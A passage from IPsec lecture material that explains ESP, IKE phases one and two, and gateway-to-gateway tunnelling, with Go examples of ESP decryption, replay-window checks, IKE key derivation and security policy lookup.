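		return out, errors.New("packet too short")
	}
	body, tag := pkt[:len(pkt)-icvLen], pkt[len(pkt)-icvLen:]
	if !hmac.Equal(tag, icv(k.Auth, body)) {
		return out, errors.New("integrity check failed")
	}
	iv, ct := body[8:8+blockSize], body[8+blockSize:]
	if len(ct)%blockSize != 0 {
		return out, errors.New("ciphertext is not block aligned")
	}
	block, err := aes.NewCipher(k.Enc)
	if err != nil {
		return out, err
	}
	plain := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, ct)
	padLen := int(plain[len(plain)-2])
	end := len(plain) - 2 - padLen
	if end < 0 {
		return out, errors.New("bad pad length")
	}
	for i := 0; i < padLen; i++ { // padding must read 1, 2, 3, ...
		if plain[end+i] != byte(i+1) {
			return out, errors.New("bad padding")
		}
	}
	out.SPI = binary.BigEndian.Uint32(body[0:4])
	out.Seq = binary.BigEndian.Uint32(body[4:8])
	out.NextHeader = plain[len(plain)-1]
	out.Payload = plain[:end]
	return out, nil
}
```

Verifying the ICV before decrypting is deliberate: it keeps padding errors from becoming an oracle and drops forged packets at the cheapest point.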
How ESP works
Example
The example packet contains five sections: Ethernet header, IP header, ESP header, encrypted data (payload and ESP trailer), and (optionally) authentication information. From the encrypted data it is not possible to determine whether this packet was generated in transport mode or tunnel mode: the Next Header field that tells them apart is inside the encrypted ESP trailer.
Example
ESP headers for the first four packets in an ESP session between A and B: the SPI is the same in all four, while the Sequence Number increases by one per packet.
The SPI and Sequence Number fields work the same way in ESP as they do in AH.
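The receiver-side processing of those two fields, as an added example (not code from the original slides): the SA is located from (destination address, SPI, protocol) and the sequence number is then checked against a sliding window. The addresses, the SPI and the 64-packet window width are made-up sample values, and the check assumes the ICV has already been verified.

```go
package main

import (
	"errors"
	"fmt"
)

// SASelector is the triple the recipient uses to find the inbound SA.
type SASelector struct {
	Dst   string // outer destination IP address
	SPI   uint32
	Proto byte // 50 = ESP, 51 = AH
}

const windowSize = 64

// ReplayWindow is the sliding window of RFC 4303: top is the highest sequence
// number accepted so far and bit i of seen records whether top-i was accepted.
type ReplayWindow struct {
	top  uint32
	seen uint64
}

// Check accepts seq once; duplicates and packets older than the window are
// rejected. It must run only after the ICV has verified, because the sequence
// number is only trustworthy when integrity protection covers it.
func (w *ReplayWindow) Check(seq uint32) error {
	switch {
	case seq == 0:
		return errors.New("sequence number 0 is never valid")
	case seq > w.top: // new high-water mark: slide the window forward
		if shift := seq - w.top; shift >= windowSize {
			w.seen = 1
		} else {
			w.seen = w.seen<<shift | 1
		}
		w.top = seq
		return nil
	case w.top-seq >= windowSize:
		return fmt.Errorf("sequence %d is behind the window (top %d)", seq, w.top)
	default: // inside the window: accept only if not yet seen
		bit := uint64(1) << (w.top - seq)
		if w.seen&bit != 0 {
			return fmt.Errorf("replay of sequence %d", seq)
		}
		w.seen |= bit
		return nil
	}
}

// SADB maps selectors to inbound SA state (only the replay window here).
type SADB map[SASelector]*ReplayWindow

// Inbound does what the receiving gateway does with every packet on the SA:
// locate the SA from (destination, SPI, protocol), then apply its window.
// A packet with no matching SA is dropped.
func (db SADB) Inbound(dst string, spi uint32, proto byte, seq uint32) error {
	w, ok := db[SASelector{dst, spi, proto}]
	if !ok {
		return fmt.Errorf("no SA for dst=%s spi=0x%x proto=%d", dst, spi, proto)
	}
	return w.Check(seq)
}

func main() {
	// Constructed sample: one inbound ESP SA at gateway 203.0.113.2, SPI 0x1000.
	db := SADB{{Dst: "203.0.113.2", SPI: 0x1000, Proto: 50}: &ReplayWindow{}}
	for _, seq := range []uint32{1, 2, 3, 4, 2, 6, 5, 200, 100} {
		fmt.Printf("seq %3d: %v\n", seq, db.Inbound("203.0.113.2", 0x1000, 50, seq))
	}
}
```

Out-of-order delivery inside the window (6 before 5) is accepted; a second copy of 2 or 5 is not, and once the window has slid past 100 that packet is dropped even though it was never seen.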
Internet Key Exchange (IKE)
The IKE protocol negotiates, creates, and manages security associations (SAs). SA is a generic term for a set of values that define the IPsec features and protections applied to a connection (algorithms, keys, SPI, mode, lifetime). IPsec SAs are unidirectional, so a bidirectional connection needs a pair of them.
The IKE protocol has two phases (the phases and modes below are IKEv1 terms, RFC 2409; IKEv2 replaces them with the IKE_SA_INIT and IKE_AUTH exchanges):
• Phase One Exchange → the IPsec endpoints negotiate a secure, authenticated channel (the IKE SA) through which IPsec SAs can be negotiated
• Phase Two Exchange → the purpose of phase two is to establish the SAs for the actual IPsec connection
Phase One Exchange Modes
• Main mode. It negotiates the establishment of the IKE SA through three pairs of messages
1 In the first pair of messages, each endpoint proposes parameters to be used for the SA
2 The second pair of messages performs a key exchange through Diffie-Hellman and carries the nonces
3 In the third pair of messages, each endpoint is authenticated to the other; these two messages are already encrypted with keys derived from the Diffie-Hellman secret, so the identities are not sent in the clear
• Aggressive mode. It offers a faster alternative to main mode. It negotiates the establishment of the IKE SA through three messages
1 In the first message, endpoint A sends all the protection suite parameters, as well as its portion of the Diffie-Hellman key exchange, a nonce, and its identity
2 In the second message, endpoint B sends the protection suite parameters, its portion of the Diffie-Hellman key exchange, a nonce, its identity, and its authentication payload (through digital signature or hash)
3 In the third message, endpoint A sends its authentication payload
The price of the shorter exchange is that identities travel unencrypted and, with pre-shared keys, the authentication hash in message 2 can be captured and attacked offline by guessing the key; aggressive mode with pre-shared keys should therefore be avoided
Phase One Exchange
In phase one, each endpoint proposes parameters for the SA. The four mandatory parameters are referred to as the protection suite:
• Encryption Algorithm. This specifies the algorithm to be used to encrypt data, e.g. DES, 3DES, AES, ... (DES is no longer acceptable; AES should be used)
• Integrity Protection Algorithm. This indicates which keyed hash algorithm should be used for integrity protection, e.g. HMAC-MD5, HMAC-SHA-1, ... (HMAC-SHA-256 or stronger is preferred today)
• Diffie-Hellman (DH) Group. It selects the group (modulus and generator, or elliptic curve) used to generate a shared secret for the endpoints in a secure manner; the group's strength bounds the strength of the IKE SA
• Authentication Method. There are several possible methods for authenticating the two endpoints (pre-shared keys, digital signatures, ... )
Phase Two Exchange
The purpose of phase two (quick mode) is to establish the SAs for the actual IPsec connection (IPsec SAs). The exchange is protected by the IKE SA and takes three messages:
• In the first message, endpoint A sends keying material, nonces, and IPsec SA parameter proposals (including the SPI it will accept). The nonces are an anti-replay measure; optionally a fresh Diffie-Hellman value is included to obtain Perfect Forward Secrecy
• In the second message, endpoint B sends keying material, nonces, and its IPsec SA parameter selections, plus a hash for authentication
• In the third message, endpoint A sends a hash for authentication
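Both phases as an added model written for this edit, not code from the slides: phase one main mode with pre-shared-key authentication (the Diffie-Hellman step uses group 19, P-256, through Go's `crypto/ecdh`, which needs Go 1.20 or later), followed by the phase two derivation of per-SA keys. The formulas follow the shape of RFC 2409 sections 5.4 and 5.5 with HMAC-SHA-256 as the prf, but the cookies and the exact payload encodings are omitted; the identities `gw-a.example`/`gw-b.example`, the pre-shared key and the SPIs are sample values.

```go
package main

import (
	"crypto/ecdh"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
)

// prf is the keyed hash every derivation below uses (HMAC-SHA-256 here).
func prf(key []byte, parts ...[]byte) []byte {
	m := hmac.New(sha256.New, key)
	for _, p := range parts {
		m.Write(p)
	}
	return m.Sum(nil)
}

// Peer is one endpoint's phase one state: its identity, nonce and DH private value.
type Peer struct {
	ID    string
	Nonce []byte
	dh    *ecdh.PrivateKey
}

// NewPeer draws the DH private value (group 19, P-256) and a 16-byte nonce.
// It panics only if the system RNG is unavailable, which no handshake can survive.
func NewPeer(id string) *Peer {
	priv, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	nonce := make([]byte, 16)
	if _, err := rand.Read(nonce); err != nil {
		panic(err)
	}
	return &Peer{ID: id, Nonce: nonce, dh: priv}
}

// Public is the DH value sent in message 3 (initiator) or 4 (responder).
func (p *Peer) Public() []byte { return p.dh.PublicKey().Bytes() }

// SharedSecret completes the exchange; a malformed peer value is rejected, not used.
func (p *Peer) SharedSecret(peerPub []byte) ([]byte, error) {
	pub, err := ecdh.P256().NewPublicKey(peerPub)
	if err != nil {
		return nil, err
	}
	return p.dh.ECDH(pub)
}

// PhaseOneKeys follows RFC 2409 for pre-shared keys, minus the cookies:
// SKEYID = prf(psk, Ni | Nr) and SKEYID_d = prf(SKEYID, g^xy | 0).
func PhaseOneKeys(psk, shared, ni, nr []byte) (skeyid, skeyidD []byte) {
	skeyid = prf(psk, ni, nr)
	return skeyid, prf(skeyid, shared, []byte{0})
}

// AuthHash is the authentication payload of messages 5 and 6: a keyed hash over
// both DH values and the sender's identity. Only a holder of the same PSK (hence
// the same SKEYID) can produce or verify it, and it is bound to this exchange.
func AuthHash(skeyid, myPub, peerPub []byte, myID string) []byte {
	return prf(skeyid, myPub, peerPub, []byte(myID))
}

// RunMainMode plays both sides of phase one in one process and returns SKEYID_d,
// or an error when a hash does not verify (for instance, different PSKs).
func RunMainMode(initPSK, respPSK []byte) ([]byte, error) {
	i, r := NewPeer("gw-a.example"), NewPeer("gw-b.example")
	si, err := i.SharedSecret(r.Public()) // messages 3 and 4 exchanged
	if err != nil {
		return nil, err
	}
	sr, err := r.SharedSecret(i.Public())
	if err != nil {
		return nil, err
	}
	iSKEYID, iD := PhaseOneKeys(initPSK, si, i.Nonce, r.Nonce)
	rSKEYID, _ := PhaseOneKeys(respPSK, sr, i.Nonce, r.Nonce)
	hashI := AuthHash(iSKEYID, i.Public(), r.Public(), i.ID) // sent by A in message 5
	hashR := AuthHash(rSKEYID, r.Public(), i.Public(), r.ID) // sent by B in message 6
	if !hmac.Equal(hashI, AuthHash(rSKEYID, i.Public(), r.Public(), i.ID)) ||
		!hmac.Equal(hashR, AuthHash(iSKEYID, r.Public(), i.Public(), r.ID)) {
		return nil, errors.New("phase one authentication failed")
	}
	return iD, nil
}

// PhaseTwoKeys derives the keying material of one IPsec SA (quick mode, no PFS):
// KEYMAT = prf(SKEYID_d, protocol | SPI | Ni2 | Nr2). Each direction has its own
// SPI, so the two SAs of one connection get different keys from the same SKEYID_d.
func PhaseTwoKeys(skeyidD []byte, proto byte, spi uint32, ni2, nr2 []byte) []byte {
	spiBytes := []byte{byte(spi >> 24), byte(spi >> 16), byte(spi >> 8), byte(spi)}
	return prf(skeyidD, []byte{proto}, spiBytes, ni2, nr2)
}
```

Note what the pre-shared key does and does not do here: it never leaves either host, it only keys the hash that each side verifies, and a wrong key on one side makes `RunMainMode` fail before any IPsec SA is derived.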
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point Security
Introduction
VPN Architectures
IPSec Fundamentals
Practical Examples
ESP in a Gw-to-Gw Architecture
The goal is to establish an IPsec connection that provides encryption and partial integrity protection (the outer IP header is not covered) between gateways A and B. Initially, we have to create an IKE SA, as follows:
1 Endpoint A creates and sends a regular (non-IPsec) packet that has a destination address of endpoint B
2 Network A routes the packet to gateway A
3 Gateway A receives the packet and performs NAT, altering the packet's source IP address
4 Gateway A initiates an IKE SA negotiation with gateway B using either main mode or aggressive mode. At the end of the negotiation, the IKE SA is created
ESP in a Gw-to-Gw Architecture
The next step is to create the IPsec SA, as follows:
5 Gateway A uses the parameters set in the IKE SA to initiate an IPsec SA negotiation with gateway B. ESP tunnel mode is used
6 Once the two IPsec SAs are created (one per direction), gateway A finishes processing the packet sent by endpoint A in step 1:
1 Gateway A modifies the packet in accordance with the SA parameters: a new IP header is added (source IP: gateway A, destination IP: gateway B), the original packet is encrypted and the authentication information is appended
2 Gateway A then sends the packet to gateway B
3 Gateway B receives the packet and uses the SPI value in the unencrypted ESP header to determine the SA parameters. Gateway B processes and validates the packet: it removes the additional IP header, checks the integrity and only then decrypts the original packet
4 Gateway B sends the packet to endpoint B
AH and ESP in a Gw-to-Gw Architecture
The goal is to establish an IPsec connection that provides encryption and complete integrity protection (including the outer headers) between gateways A and B
Steps 1-4 are identical to the previous example
5 Gateway A uses the parameters set in the IKE SA to initiate an IPsec SA negotiation with gateway B for the AH service. The IKE SA protects the negotiation of the AH tunnel-mode SAs
6 Step 5 is repeated to negotiate the SAs for the ESP service. On each packet ESP is applied first and AH outside it, so the AH MAC also covers the ESP header and the outer IP header (except its mutable fields)
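The gateway steps around the ESP processing in the two examples above, as an added example (not code from the slides): the security policy lookup that decides whether a packet leaving network A is tunnelled, bypassed or discarded, the outer IPv4 header (protocol 50 = ESP) that gateway A prepends in step 6.1, and the checks gateway B applies to that header in step 6.3 before handing the body to the SA selected by its SPI. The network prefixes and gateway addresses are sample values, the ESP body is treated as opaque bytes produced by the SA, and the outer header is the minimal 20-byte IPv4 form.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"net"
)

// Action is the outcome of the security policy database (SPD) lookup.
type Action int

const (
	Bypass  Action = iota // forward in the clear
	Protect               // tunnel to the peer gateway
	Discard
)

// Policy is one SPD entry: traffic from Src to Dst gets Action via PeerGW.
type Policy struct {
	Src, Dst *net.IPNet
	Action   Action
	PeerGW   net.IP
}

func mustCIDR(s string) *net.IPNet {
	_, n, err := net.ParseCIDR(s)
	if err != nil {
		panic(err)
	}
	return n
}

// Lookup returns the first matching policy; no match means discard (RFC 4301).
func Lookup(spd []Policy, src, dst net.IP) Policy {
	for _, p := range spd {
		if p.Src.Contains(src) && p.Dst.Contains(dst) {
			return p
		}
	}
	return Policy{Action: Discard}
}

// checksum is the RFC 791 one's-complement header checksum; it yields 0 over a valid header.
func checksum(h []byte) uint16 {
	var sum uint32
	for i := 0; i+1 < len(h); i += 2 {
		sum += uint32(binary.BigEndian.Uint16(h[i : i+2]))
	}
	for sum>>16 != 0 {
		sum = sum&0xffff + sum>>16
	}
	return ^uint16(sum)
}

// Tunnel is step 6.1: prepend a fresh IPv4 header from this gateway to the peer
// gateway, protocol 50 (ESP), around the ESP-protected body.
func Tunnel(gw net.IP, p Policy, espBody []byte) []byte {
	h := make([]byte, 20, 20+len(espBody))
	h[0] = 0x45 // version 4, header length 5 words
	binary.BigEndian.PutUint16(h[2:4], uint16(20+len(espBody)))
	h[8] = 64 // TTL
	h[9] = 50 // ESP
	copy(h[12:16], gw.To4())
	copy(h[16:20], p.PeerGW.To4())
	binary.BigEndian.PutUint16(h[10:12], checksum(h))
	return append(h, espBody...)
}

// Untunnel is the matching check at gateway B before the ESP body is handed to
// the SA selected by its SPI: the outer header must be intact, addressed to this
// gateway and carry ESP. The source gateway is returned for matching against the SA.
func Untunnel(gw net.IP, pkt []byte) (espBody []byte, srcGW net.IP, err error) {
	switch {
	case len(pkt) < 20 || pkt[0] != 0x45:
		return nil, nil, errors.New("not a plain IPv4 packet")
	case checksum(pkt[:20]) != 0:
		return nil, nil, errors.New("bad IPv4 header checksum")
	case int(binary.BigEndian.Uint16(pkt[2:4])) != len(pkt):
		return nil, nil, errors.New("total length does not match packet size")
	case !net.IP(pkt[16:20]).Equal(gw):
		return nil, nil, errors.New("outer destination is not this gateway")
	case pkt[9] != 50:
		return nil, nil, fmt.Errorf("outer protocol %d is not ESP", pkt[9])
	}
	return pkt[20:], net.IP(pkt[12:16]), nil
}
```

The discard-by-default return in `Lookup` is the RFC 4301 rule: traffic that no policy mentions must not leak out in the clear just because it matched nothing.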